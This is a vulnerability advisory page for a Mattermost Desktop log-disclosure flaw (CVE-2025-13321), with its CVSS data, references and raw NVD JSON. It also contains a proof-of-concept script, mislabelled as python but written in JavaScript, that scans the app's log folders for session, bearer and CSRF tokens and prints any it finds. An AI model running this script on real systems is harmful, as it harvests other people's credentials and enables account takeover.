CVE-2025-13321

Description

Mattermost Desktop App versions <6.0.0 fail to sanitize sensitive information from Mattermost logs and clear data on server deletion which allows an attacker with access to the users system to gain access to potentially sensitive information via reading the application logs.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_desktop:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost Desktop App < 6.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-13321 PoC - Mattermost Desktop App Log Information Disclosure
// Author: Security Researcher
// Target: Mattermost Desktop App < 6.0.0

const fs = require('fs');
const path = require('path');

// Common Mattermost log locations
const logPaths = {
  win32: path.join(process.env.APPDATA, 'Mattermost', 'logs'),
  darwin: path.join(process.env.HOME, 'Library', 'Application Support', 'Mattermost', 'logs'),
  linux: path.join(process.env.HOME, '.config', 'Mattermost', 'logs')
};

function searchSensitiveInfo(logDir) {
  if (!fs.existsSync(logDir)) {
    console.log('[-] Log directory not found');
    return;
  }
  
  const files = fs.readdirSync(logDir);
  const sensitivePatterns = [
    /token[a-zA-Z0-9=\-_]{20,}/gi,
    /bearer\s+[a-zA-Z0-9=\-_]{20,}/gi,
    /"sessionToken"\s*:\s*"[^"]+"/gi,
    /"token"\s*:\s*"[^"]+"/gi,
    /CSRF\s*=\s*[a-zA-Z0-9=\-_]{20,}/gi
  ];
  
  files.forEach(file => {
    if (file.endsWith('.log')) {
      const content = fs.readFileSync(path.join(logDir, file), 'utf8');
      sensitivePatterns.forEach(pattern => {
        const matches = content.match(pattern);
        if (matches) {
          console.log(`[+] Found sensitive data in ${file}:`);
          matches.forEach(m => console.log(`    ${m}`));
        }
      });
    }
  });
}

// Execute
const platform = process.platform;
searchSensitiveInfo(logPaths[platform] || logPaths.linux);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13321
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13321
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13321/
[4] VulDB https://vuldb.com/cve/CVE-2025-13321
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13321", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:00.927", "lastModified": "2025-12-18T19:41:30.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost Desktop App versions <6.0.0 fail to sanitize sensitive information from Mattermost logs and clear data on server deletion which allows an attacker with access to the users system to gain access to potentially sensitive information via reading the application logs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_desktop:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.0", "matchCriteriaId": "6DD607D2-5B4D-49F7-AB83-2DAD88C94DB8"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}